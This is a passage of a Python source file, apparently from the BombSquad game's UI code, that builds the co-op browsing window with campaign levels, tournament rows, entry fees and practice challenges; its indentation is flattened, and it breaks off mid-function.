from bastd.ui.store.browser import StoreBrowserWindow
if TYPE_CHECKING:
from typing import Any, Optional, Union
class CoopBrowserWindow(ba.Window):
"""Window for browsing co-op levels/games/etc."""
def _update_corner_button_positions(self) -> None:
uiscale = ba.app.ui.uiscale
offs = (-55 if uiscale is ba.UIScale.SMALL
and _ba.is_party_icon_visible() else 0)
if self._league_rank_button is not None:
self._league_rank_button.set_position(
(self._width - 282 + offs - self._x_inset, self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)))
if self._store_button is not None:
self._store_button.set_position(
(self._width - 170 + offs - self._x_inset, self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)))
def __init__(self,
transition: Optional[str] = 'in_right',
origin_widget: Optional[ba.Widget] = None):
# pylint: disable=too-many-statements
# pylint: disable=cyclic-import
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
ba.set_analytics_screen('Coop Window')
app = ba.app
cfg = app.config
# Quick note to players that tourneys won't work in ballistica
# core builds. (need to split the word so it won't get subbed out)
if 'ballistica' + 'core' == _ba.appname():
ba.timer(1.0,
lambda: ba.screenmessage(
ba.Lstr(resource='noTournamentsInTestBuildText'),
color=(1, 1, 0),
),
timetype=ba.TimeType.REAL)
# If they provided an origin-widget, scale up from that.
scale_origin: Optional[tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
# Try to recreate the same number of buttons we had last time so our
# re-selection code works.
self._tournament_button_count = app.config.get('Tournament Rows', 0)
assert isinstance(self._tournament_button_count, int)
self._easy_button: Optional[ba.Widget] = None
self._hard_button: Optional[ba.Widget] = None
self._hard_button_lock_image: Optional[ba.Widget] = None
self._campaign_percent_text: Optional[ba.Widget] = None
uiscale = ba.app.ui.uiscale
self._width = 1320 if uiscale is ba.UIScale.SMALL else 1120
self._x_inset = x_inset = 100 if uiscale is ba.UIScale.SMALL else 0
self._height = (657 if uiscale is ba.UIScale.SMALL else
730 if uiscale is ba.UIScale.MEDIUM else 800)
app.ui.set_main_menu_location('Coop Select')
self._r = 'coopSelectWindow'
top_extra = 20 if uiscale is ba.UIScale.SMALL else 0
self._tourney_data_up_to_date = False
self._campaign_difficulty = _ba.get_account_misc_val(
'campaignDifficulty', 'easy')
super().__init__(root_widget=ba.containerwidget(
size=(self._width, self._height + top_extra),
toolbar_visibility='menu_full',
scale_origin_stack_offset=scale_origin,
stack_offset=((0, -15) if uiscale is ba.UIScale.SMALL else (0, 0)),
transition=transition,
scale=(1.2 if uiscale is ba.UIScale.SMALL else
0.8 if uiscale is ba.UIScale.MEDIUM else 0.75)))
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
self._back_button = None
else:
self._back_button = ba.buttonwidget(
parent=self._root_widget,
position=(75 + x_inset, self._height - 87 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(120, 60),
scale=1.2,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back')
self._league_rank_button: Optional[LeagueRankButton]
self._store_button: Optional[StoreButton]
self._store_button_widget: Optional[ba.Widget]
self._league_rank_button_widget: Optional[ba.Widget]
if not app.ui.use_toolbars:
prb = self._league_rank_button = LeagueRankButton(
parent=self._root_widget,
position=(self._width - (282 + x_inset), self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(100, 60),
color=(0.4, 0.4, 0.9),
textcolor=(0.9, 0.9, 2.0),
scale=1.05,
on_activate_call=ba.WeakCall(self._switch_to_league_rankings))
self._league_rank_button_widget = prb.get_button()
sbtn = self._store_button = StoreButton(
parent=self._root_widget,
position=(self._width - (170 + x_inset), self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(100, 60),
color=(0.6, 0.4, 0.7),
show_tickets=True,
button_type='square',
sale_scale=0.85,
textcolor=(0.9, 0.7, 1.0),
scale=1.05,
on_activate_call=ba.WeakCall(self._switch_to_score, None))
self._store_button_widget = sbtn.get_button()
ba.widget(edit=self._back_button,
right_widget=self._league_rank_button_widget)
ba.widget(edit=self._league_rank_button_widget,
left_widget=self._back_button)
else:
self._league_rank_button = None
self._store_button = None
self._store_button_widget = None
self._league_rank_button_widget = None
# Move our corner buttons dynamically to keep them out of the way of
# the party icon :-(
self._update_corner_button_positions()
self._update_corner_button_positions_timer = ba.Timer(
1.0,
ba.WeakCall(self._update_corner_button_positions),
repeat=True,
timetype=ba.TimeType.REAL)
self._last_tournament_query_time: Optional[float] = None
self._last_tournament_query_response_time: Optional[float] = None
self._doing_tournament_query = False
self._selected_campaign_level = (cfg.get(
'Selected Coop Campaign Level', None))
self._selected_custom_level = (cfg.get('Selected Coop Custom Level',
None))
self._selected_challenge_level = (cfg.get(
'Selected Coop Challenge Level', None))
# Don't want initial construction affecting our last-selected.
self._do_selection_callbacks = False
v = self._height - 95
txt = ba.textwidget(
parent=self._root_widget,
position=(self._width * 0.5,
v + 40),
size=(0, 0),
text=ba.Lstr(resource='playModes.singlePlayerCoopText',
fallback_resource='playModes.coopText'),
h_align='center',
color=app.ui.title_color,
scale=1.5,
maxwidth=500,
v_align='center')
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.textwidget(edit=txt, text='')
if self._back_button is not None:
ba.buttonwidget(
edit=self._back_button,
button_type='backSmall',
size=(60, 50),
position=(75 + x_inset, self._height - 87 -
(4 if uiscale is ba.UIScale.SMALL else 0) + 6),
label=ba.charstr(ba.SpecialChar.BACK))
self._selected_row = cfg.get('Selected Coop Row', None)
self.star_tex = ba.gettexture('star')
self.lsbt = ba.getmodel('level_select_button_transparent')
self.lsbo = ba.getmodel('level_select_button_opaque')
self.a_outline_tex = ba.gettexture('achievementOutline')
self.a_outline_model = ba.getmodel('achievementOutline')
self._scroll_width = self._width - (130 + 2 * x_inset)
self._scroll_height = (self._height -
(190 if uiscale is ba.UIScale.SMALL
and app.ui.use_toolbars else 160))
self._subcontainerwidth = 800.0
self._subcontainerheight = 1400.0
self._scrollwidget = ba.scrollwidget(
parent=self._root_widget,
highlight=False,
position=(65 + x_inset, 120) if uiscale is ba.UIScale.SMALL
and app.ui.use_toolbars else (65 + x_inset, 70),
size=(self._scroll_width, self._scroll_height),
simple_culling_v=10.0,
claims_left_right=True,
claims_tab=True,
selection_loops_to_parent=True)
self._subcontainer: Optional[ba.Widget] = None
# Take note of our account state; we'll refresh later if this changes.
self._account_state_num = _ba.get_account_state_num()
# Same for fg/bg state.
self._fg_state = app.fg_state
self._refresh()
self._restore_state()
# Even though we might display cached tournament data immediately, we
# don't consider it valid until we've pinged the server for an update.
self._tourney_data_up_to_date = False
# If we've got a cached tournament list for our account and info for
# each one of those tournaments, go ahead and display it as a
# starting point.
if (app.accounts.account_tournament_list is not None
and app.accounts.account_tournament_list[0]
== _ba.get_account_state_num()
and all(t_id in app.accounts.tournament_info
for t_id in app.accounts.account_tournament_list[1])):
tourney_data = [
app.accounts.tournament_info[t_id]
for t_id in app.accounts.account_tournament_list[1]
]
self._update_for_data(tourney_data)
# This will pull new data periodically, update timers, etc.
self._update_timer = ba.Timer(1.0,
ba.WeakCall(self._update),
timetype=ba.TimeType.REAL,
repeat=True)
self._update()
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
import bastd.ui.purchase as _unused1
import bastd.ui.coop.gamebutton as _unused2
import bastd.ui.confirm as _unused3
import bastd.ui.account as _unused4
import bastd.ui.league.rankwindow as _unused5
import bastd.ui.store.browser as _unused6
import bastd.ui.account.viewer as _unused7
import bastd.ui.tournamentscores as _unused8
import bastd.ui.tournamententry as _unused9
import bastd.ui.play as _unused10
def _update(self) -> None:
# Do nothing if we've somehow outlived our actual UI.
if not self._root_widget:
return
cur_time = ba.time(ba.TimeType.REAL)
# If it's been a while since we got a tournament update, consider the
# data invalid (prevents us from joining tournaments if our internet
# connection goes down for a while).
if (self._last_tournament_query_response_time is None
or ba.time(ba.TimeType.REAL) -
self._last_tournament_query_response_time > 60.0 * 2):
self._tourney_data_up_to_date = False
# If our account state has changed, do a full request.
account_state_num = _ba.get_account_state_num()
if account_state_num != self._account_state_num:
self._account_state_num = account_state_num
self._save_state()
self._refresh()
# Also encourage a new tournament query since this will clear out
# our current results.
if not self._doing_tournament_query:
self._last_tournament_query_time = None
# If we've been backgrounded/foregrounded, invalidate our
# tournament entries (they will be refreshed below asap).
if self._fg_state != ba.app.fg_state:
self._tourney_data_up_to_date = False
# Send off a new tournament query if it's been long enough.
if not self._doing_tournament_query and (
self._last_tournament_query_time is None
or cur_time - self._last_tournament_query_time > 30.0
or self._fg_state != ba.app.fg_state):
self._fg_state = ba.app.fg_state
self._last_tournament_query_time = cur_time
self._doing_tournament_query = True
_ba.tournament_query(
args={
'source': 'coop window refresh',
'numScores': 1
},
callback=ba.WeakCall(self._on_tournament_query_response),
)
# Decrement time on our tournament buttons.
ads_enabled = _ba.have_incentivized_ad()
for tbtn in self._tournament_buttons:
tbtn['time_remaining'] = max(0, tbtn['time_remaining'] - 1)
if tbtn['time_remaining_value_text'] is not None:
ba.textwidget(
edit=tbtn['time_remaining_value_text'],
text=ba.timestring(tbtn['time_remaining'],
centi=False,
suppress_format_warning=True) if
(tbtn['has_time_remaining']
and self._tourney_data_up_to_date) else '-')
# Also adjust the ad icon visibility.
if tbtn.get('allow_ads', False) and _ba.has_video_ads():
ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
opacity=1.0 if ads_enabled else 0.25)
ba.textwidget(edit=tbtn['entry_fee_text_remaining'],
color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
self._update_hard_mode_lock_image()
def _update_hard_mode_lock_image(self) -> None:
try:
ba.imagewidget(
edit=self._hard_button_lock_image,
opacity=0.0 if ba.app.accounts.have_pro_options() else 1.0)
except Exception:
ba.print_exception('Error updating campaign lock.')
def _update_for_data(self, data: Optional[list[dict[str, Any]]]) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
from ba.internal import getcampaign, get_tournament_prize_strings
# If the number of tournaments or challenges in the data differs from
# our current arrangement, refresh with the new number.
if ((data is None and self._tournament_button_count != 0)
or (data is not None and
(len(data) != self._tournament_button_count))):
self._tournament_button_count = len(
data) if data is not None else 0
ba.app.config['Tournament Rows'] = self._tournament_button_count
self._refresh()
# Update all of our tourney buttons based on what's in the data.
for i, tbtn in enumerate(self._tournament_buttons):
assert data is not None
entry: dict[str, Any] = data[i]
prize_y_offs = (34 if 'prizeRange3' in entry else
20 if 'prizeRange2' in entry else 12)
x_offs = 90
# This seems to be a false alarm.
# pylint: disable=unbalanced-tuple-unpacking
pr1, pv1, pr2, pv2, pr3, pv3 = (
get_tournament_prize_strings(entry))
# pylint: enable=unbalanced-tuple-unpacking
enabled = 'requiredLeague' not in entry
ba.buttonwidget(edit=tbtn['button'],
color=(0.5, 0.7, 0.2) if enabled else
(0.5, 0.5, 0.5))
ba.imagewidget(edit=tbtn['lock_image'],
opacity=0.0 if enabled else 1.0)
ba.textwidget(edit=tbtn['prize_range_1_text'],
text='-' if pr1 == '' else pr1,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 + prize_y_offs))
# We want to draw values containing tickets a bit smaller
# (scratch that; we now draw medals a bit bigger).
ticket_char = ba.charstr(ba.SpecialChar.TICKET_BACKING)
prize_value_scale_large = 1.0
prize_value_scale_small = 1.0
ba.textwidget(edit=tbtn['prize_value_1_text'],
text='-' if pv1 == '' else pv1,
scale=prize_value_scale_large if ticket_char
not in pv1 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_range_2_text'],
text=pr2,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 45 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_value_2_text'],
text=pv2,
scale=prize_value_scale_large if ticket_char
not in pv2 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 45 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_range_3_text'],
text=pr3,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 90 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_value_3_text'],
text=pv3,
scale=prize_value_scale_large if ticket_char
not in pv3 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 90 + prize_y_offs))
leader_name = '-'
leader_score: Union[str, ba.Lstr] = '-'
if entry['scores']:
score = tbtn['leader'] = copy.deepcopy(entry['scores'][0])
leader_name = score[1]
leader_score = (ba.timestring(
score[0] * 10,
centi=True,
timeformat=ba.TimeFormat.MILLISECONDS,
suppress_format_warning=True) if entry['scoreType']
== 'time' else str(score[0]))
else:
tbtn['leader'] = None
ba.textwidget(edit=tbtn['current_leader_name_text'],
text=ba.Lstr(value=leader_name))
self._tournament_leader_score_type = (entry['scoreType'])
ba.textwidget(edit=tbtn['current_leader_score_text'],
text=leader_score)
ba.buttonwidget(edit=tbtn['more_scores_button'],
label=ba.Lstr(resource=self._r + '.seeMoreText'))
out_of_time_text: Union[str, ba.Lstr] = (
'-' if 'totalTime' not in entry else ba.Lstr(
resource=self._r + '.ofTotalTimeText',
subs=[('${TOTAL}',
ba.timestring(entry['totalTime'],
centi=False,
suppress_format_warning=True))]))
ba.textwidget(edit=tbtn['time_remaining_out_of_text'],
text=out_of_time_text)
tbtn['time_remaining'] = entry['timeRemaining']
tbtn['has_time_remaining'] = entry is not None
tbtn['tournament_id'] = entry['tournamentID']
tbtn['required_league'] = (None if 'requiredLeague' not in entry
else entry['requiredLeague'])
game = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['game']
if game is None:
ba.textwidget(edit=tbtn['button_text'], text='-')
ba.imagewidget(edit=tbtn['image'],
texture=ba.gettexture('black'),
opacity=0.2)
else:
campaignname, levelname = game.split(':')
campaign = getcampaign(campaignname)
max_players = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['maxPlayers']
txt = ba.Lstr(
value='${A} ${B}',
subs=[('${A}', campaign.getlevel(levelname).displayname),
('${B}',
ba.Lstr(resource='playerCountAbbreviatedText',
subs=[('${COUNT}', str(max_players))]))])
ba.textwidget(edit=tbtn['button_text'], text=txt)
ba.imagewidget(
edit=tbtn['image'],
texture=campaign.getlevel(levelname).get_preview_texture(),
opacity=1.0 if enabled else 0.5)
fee = entry['fee']
if fee is None:
fee_var = None
elif fee == 4:
fee_var = 'price.tournament_entry_4'
elif fee == 3:
fee_var = 'price.tournament_entry_3'
elif fee == 2:
fee_var = 'price.tournament_entry_2'
elif fee == 1:
fee_var = 'price.tournament_entry_1'
else:
if fee != 0:
print('Unknown fee value:', fee)
fee_var = 'price.tournament_entry_0'
tbtn['allow_ads'] = allow_ads = entry['allowAds']
final_fee: Optional[int] = (None if fee_var is None else
_ba.get_account_misc_read_val(
fee_var, '?'))
final_fee_str: Union[str, ba.Lstr]
if fee_var is None:
final_fee_str = ''
else:
if final_fee == 0:
final_fee_str = ba.Lstr(
resource='getTicketsWindow.freeText')
else:
final_fee_str = (
ba.charstr(ba.SpecialChar.TICKET_BACKING) +
str(final_fee))
ad_tries_remaining = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['adTriesRemaining']
free_tries_remaining = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['freeTriesRemaining']
# Now, if this fee allows ads and we support video ads, show
# the 'or ad' version.
if allow_ads and _ba.has_video_ads():
ads_enabled = _ba.have_incentivized_ad()
ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
opacity=1.0 if ads_enabled else 0.25)
or_text = ba.Lstr(resource='orText',
subs=[('${A}', ''),
('${B}', '')]).evaluate().strip()
ba.textwidget(edit=tbtn['entry_fee_text_or'], text=or_text)
ba.textwidget(
edit=tbtn['entry_fee_text_top'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 60),
scale=1.3,
text=final_fee_str)
# Possibly show number of ad-plays remaining.
ba.textwidget(
edit=tbtn['entry_fee_text_remaining'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 146),
text='' if ad_tries_remaining in [None, 0] else
('' + str(ad_tries_remaining)),
color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
else:
ba.imagewidget(edit=tbtn['entry_fee_ad_image'], opacity=0.0)
ba.textwidget(edit=tbtn['entry_fee_text_or'], text='')
ba.textwidget(
edit=tbtn['entry_fee_text_top'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 80),
scale=1.3,
text=final_fee_str)
# Possibly show number of free-plays remaining.
ba.textwidget(
edit=tbtn['entry_fee_text_remaining'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 100),
text=('' if (free_tries_remaining in [None, 0]
or final_fee != 0) else
('' + str(free_tries_remaining))),
color=(0.6, 0.6, 0.6, 1))
def _on_tournament_query_response(self, data: Optional[dict[str,
Any]]) -> None:
accounts = ba.app.accounts
if data is not None:
tournament_data = data['t'] # This used to be the whole payload.
self._last_tournament_query_response_time = ba.time(
ba.TimeType.REAL)
else:
tournament_data = None
# Keep our cached tourney info up to date.
if data is not None:
self._tourney_data_up_to_date = True
accounts.cache_tournament_info(tournament_data)
# Also cache the current tourney list/order for this account.
accounts.account_tournament_list = (_ba.get_account_state_num(), [
e['tournamentID'] for e in tournament_data
])
self._doing_tournament_query = False
self._update_for_data(tournament_data)
def _set_campaign_difficulty(self, difficulty: str) -> None:
# pylint: disable=cyclic-import
from bastd.ui.purchase import PurchaseWindow
if difficulty != self._campaign_difficulty:
if difficulty == 'hard' and not ba.app.accounts.have_pro_options():
PurchaseWindow(items=['pro'])
return
ba.playsound(ba.getsound('gunCocking'))
if difficulty not in ('easy', 'hard'):
print('ERROR: invalid campaign difficulty:', difficulty)
difficulty = 'easy'
self._campaign_difficulty = difficulty
_ba.add_transaction({
'type': 'SET_MISC_VAL',
'name': 'campaignDifficulty',
'value': difficulty
})
self._refresh_campaign_row()
else:
ba.playsound(ba.getsound('click01'))
def _refresh_campaign_row(self) -> None:
# pylint: disable=too-many-locals
# pylint: disable=cyclic-import
from ba.internal import getcampaign
from bastd.ui.coop.gamebutton import GameButton
parent_widget = self._campaign_sub_container
# Clear out anything in the parent widget already.
for child in parent_widget.get_children():
child.delete()
next_widget_down = self._tournament_info_button
h = 0
v2 = -2
sel_color = (0.75, 0.85, 0.5)
sel_color_hard = (0.4, 0.7, 0.2)
un_sel_color = (0.5, 0.5, 0.5)
sel_textcolor = (2, 2, 0.8)
un_sel_textcolor = (0.6, 0.6, 0.6)
self._easy_button = ba.buttonwidget(
parent=parent_widget,
position=(h + 30, v2 + 105),
size=(120, 70),
label=ba.Lstr(resource='difficultyEasyText'),
button_type='square',
autoselect=True,
enable_sound=False,
on_activate_call=ba.Call(self._set_campaign_difficulty, 'easy'),
on_select_call=ba.Call(self.sel_change, 'campaign', 'easyButton'),
color=sel_color
if self._campaign_difficulty == 'easy' else un_sel_color,
textcolor=sel_textcolor
if self._campaign_difficulty == 'easy' else un_sel_textcolor)
ba.widget(edit=self._easy_button, show_buffer_left=100)
if self._selected_campaign_level == 'easyButton':
ba.containerwidget(edit=parent_widget,
selected_child=self._easy_button,
visible_child=self._easy_button)
lock_tex = ba.gettexture('lock')
self._hard_button = ba.buttonwidget(
parent=parent_widget,
position=(h + 30, v2 + 32),
size=(120, 70),
label=ba.Lstr(resource='difficultyHardText'),
button_type='square',
autoselect=True,
enable_sound=False,
on_activate_call=ba.Call(self._set_campaign_difficulty, 'hard'),
on_select_call=ba.Call(self.sel_change, 'campaign', 'hardButton'),
color=sel_color_hard
if self._campaign_difficulty == 'hard' else un_sel_color,
textcolor=sel_textcolor
if self._campaign_difficulty == 'hard' else un_sel_textcolor)
self._hard_button_lock_image = ba.imagewidget(
parent=parent_widget,
size=(30, 30),
draw_controller=self._hard_button,
position=(h + 30 - 10, v2 + 32 + 70 - 35),
texture=lock_tex)
self._update_hard_mode_lock_image()
ba.widget(edit=self._hard_button, show_buffer_left=100)
if self._selected_campaign_level == 'hardButton':
ba.containerwidget(edit=parent_widget,
selected_child=self._hard_button,
visible_child=self._hard_button)
ba.widget(edit=self._hard_button, down_widget=next_widget_down)
h_spacing = 200
campaign_buttons = []
if self._campaign_difficulty == 'easy':
campaignname = 'Easy'
else:
campaignname = 'Default'
items = [
campaignname + ':Onslaught Training',
campaignname + ':Rookie Onslaught',
campaignname + ':Rookie Football', campaignname + ':Pro Onslaught',
campaignname + ':Pro Football', campaignname + ':Pro Runaround',
campaignname + ':Uber Onslaught', campaignname + ':Uber Football',
campaignname + ':Uber Runaround'
]
items += [campaignname + ':The Last Stand']
if self._selected_campaign_level is None:
self._selected_campaign_level = items[0]
h = 150
for i in items:
is_last_sel = (i == self._selected_campaign_level)
campaign_buttons.append(
GameButton(self, parent_widget, i, h, v2, is_last_sel,
'campaign').get_button())
h += h_spacing
ba.widget(edit=campaign_buttons[0], left_widget=self._easy_button)
if self._back_button is not None:
ba.widget(edit=self._easy_button, up_widget=self._back_button)
for btn in campaign_buttons:
ba.widget(edit=btn,
up_widget=self._back_button,
down_widget=next_widget_down)
# Update our existing percent-complete text.
campaign = getcampaign(campaignname)
levels = campaign.levels
levels_complete = sum((1 if l.complete else 0) for l in levels)
# Last level can't be completed; hence the -1.
progress = min(1.0, float(levels_complete) / (len(levels) - 1))
p_str = str(int(progress * 100.0)) + '%'
self._campaign_percent_text = ba.textwidget(
edit=self._campaign_percent_text,
text=ba.Lstr(value='${C} (${P})',
subs=[('${C}',
ba.Lstr(resource=self._r + '.campaignText')),
('${P}', p_str)]))
def _on_tournament_info_press(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.confirm import ConfirmWindow
txt = ba.Lstr(resource=self._r + '.tournamentInfoText')
ConfirmWindow(txt,
cancel_button=False,
width=550,
height=260,
origin_widget=self._tournament_info_button)
def _refresh(self) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
# pylint: disable=cyclic-import
from bastd.ui.coop.gamebutton import GameButton
# (Re)create the sub-container if need be.
if self._subcontainer is not None:
self._subcontainer.delete()
tourney_row_height = 200
self._subcontainerheight = (
620 + self._tournament_button_count * tourney_row_height)
self._subcontainer = ba.containerwidget(
parent=self._scrollwidget,
size=(self._subcontainerwidth, self._subcontainerheight),
background=False,
claims_left_right=True,
claims_tab=True,
selection_loops_to_parent=True)
ba.containerwidget(edit=self._root_widget,
selected_child=self._scrollwidget)
if self._back_button is not None:
ba.containerwidget(edit=self._root_widget,
cancel_button=self._back_button)
w_parent = self._subcontainer
h_base = 6
v = self._subcontainerheight - 73
self._campaign_percent_text = ba.textwidget(
parent=w_parent,
position=(h_base + 27, v + 30),
size=(0, 0),
text='',
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
row_v_show_buffer = 100
v -= 198
h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
simple_culling_h=70,
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=lambda: self._on_row_selected('campaign'))
self._campaign_h_scroll = h_scroll
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=row_v_show_buffer,
autoselect=True)
if self._selected_row == 'campaign':
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
self._campaign_sub_container = ba.containerwidget(parent=h_scroll,
size=(180 + 200 * 10,
200),
background=False)
# Tournaments
self._tournament_buttons: list[dict[str, Any]] = []
v -= 53
# FIXME: Shouldn't use hard-coded strings here.
txt = ba.Lstr(resource='tournamentsText',
fallback_resource='tournamentText').evaluate()
t_width = _ba.get_string_width(txt, suppress_warning=True)
ba.textwidget(parent=w_parent,
position=(h_base + 27, v + 30),
size=(0, 0),
text=txt,
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
self._tournament_info_button = ba.buttonwidget(
parent=w_parent,
label='?',
size=(20, 20),
text_scale=0.6,
position=(h_base + 27 + t_width * 1.1 + 15, v + 18),
button_type='square',
color=(0.6, 0.5, 0.65),
textcolor=(0.7, 0.6, 0.75),
autoselect=True,
up_widget=self._campaign_h_scroll,
on_activate_call=self._on_tournament_info_press)
ba.widget(edit=self._tournament_info_button,
left_widget=self._tournament_info_button,
right_widget=self._tournament_info_button)
# Say 'unavailable' if there are zero tournaments, and if we're not
# signed in add that as well (that's probably why we see
# no tournaments).
if self._tournament_button_count == 0:
unavailable_text = ba.Lstr(resource='unavailableText')
if _ba.get_account_state() != 'signed_in':
unavailable_text = ba.Lstr(
value='${A} (${B})',
subs=[('${A}', unavailable_text),
('${B}', ba.Lstr(resource='notSignedInText'))])
ba.textwidget(parent=w_parent,
position=(h_base + 47, v),
size=(0, 0),
text=unavailable_text,
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=0.9)
v -= 40
v -= 198
tournament_h_scroll = None
if self._tournament_button_count > 0:
for i in range(self._tournament_button_count):
tournament_h_scroll = h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=ba.Call(self._on_row_selected,
'tournament' + str(i + 1)))
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=row_v_show_buffer,
autoselect=True)
if self._selected_row == 'tournament' + str(i + 1):
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
sc2 = ba.containerwidget(parent=h_scroll,
size=(self._scroll_width - 24, 200),
background=False)
h = 0
v2 = -2
is_last_sel = True
self._tournament_buttons.append(
self._tournament_button(sc2, h, v2, is_last_sel))
v -= 200
# Custom Games.
v -= 50
ba.textwidget(parent=w_parent,
position=(h_base + 27, v + 30 + 198),
size=(0, 0),
text=ba.Lstr(
resource='practiceText',
fallback_resource='coopSelectWindow.customText'),
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
items = [
'Challenges:Infinite Onslaught',
'Challenges:Infinite Runaround',
'Challenges:Ninja Fight',
'Challenges:Pro Ninja Fight',
'Challenges:Meteor Shower',
'Challenges:Target Practice B',
'Challenges:Target Practice',
]
# Show easter-egg-hunt if it's Easter or we own it.
if _ba.get_account_misc_read_val(
'easter', False) or _ba.get_purchased('games.easter_egg_hunt'):
items = [
'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
] + items
# Add all custom user levels here:
# items += [
# 'User:' + l.getname()
# for l in getcampaign('User').getlevels()
# ]
self._custom_h_scroll = custom_h_scroll = h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=ba.Call(self._on_row_selected, 'custom'))
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=1.5 * row_v_show_buffer,
autoselect=True)
if self._selected_row == 'custom':
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
sc2 = ba.containerwidget(parent=h_scroll,
size=(max(self._scroll_width - 24,
30 + 200 * len(items)), 200),
background=False)
h_spacing = 200
self._custom_buttons: list[GameButton] = []
h = 0
v2 = -2
for item in items:
is_last_sel = (item == self._selected_custom_level)
self._custom_buttons.append(
GameButton(self, sc2, item, h, v2, is_last_sel, 'custom'))
h += h_spacing
# We can't fill in our campaign row until tourney buttons are in place.
# (for wiring up)
self._refresh_campaign_row()
for i, tbutton in enumerate(self._tournament_buttons):
ba.widget(
edit=tbutton['button'],
up_widget=self._tournament_info_button
if i == 0 else self._tournament_buttons[i - 1]['button'],
down_widget=self._tournament_buttons[(i + 1)]['button']
if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
ba.widget(
edit=tbutton['more_scores_button'],
down_widget=self._tournament_buttons[(
i + 1)]['current_leader_name_text']
if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
ba.widget(edit=tbutton['current_leader_name_text'],
up_widget=self._tournament_info_button if i == 0 else
self._tournament_buttons[i - 1]['more_scores_button'])
for btn in self._custom_buttons:
try:
ba.widget(
edit=btn.get_button(),
up_widget=tournament_h_scroll if self._tournament_buttons
else self._tournament_info_button)
except Exception:
ba.print_exception('Error wiring up custom buttons.')
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
on_activate_call=self._back)
else:
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._back)
# There are probably several 'onSelected' callbacks pushed onto the
# event queue; we need to push ours too so we're enabled *after* them.
ba.pushcall(self._enable_selectable_callback)
def _on_row_selected(self, row: str) -> None:
if self._do_selection_callbacks:
if self._selected_row != row:
self._selected_row = row
def _enable_selectable_callback(self) -> None:
self._do_selection_callbacks = True
def _tournament_button(self, parent: ba.Widget, x: float, y: float,
select: bool) -> dict[str, Any]:
sclx = 300
scly = 195.0
data: dict[str, Any] = {
'tournament_id': None,
'time_remaining': 0,
'has_time_remaining': False,
'leader': None
}
data['button'] = btn = ba.buttonwidget(
parent=parent,
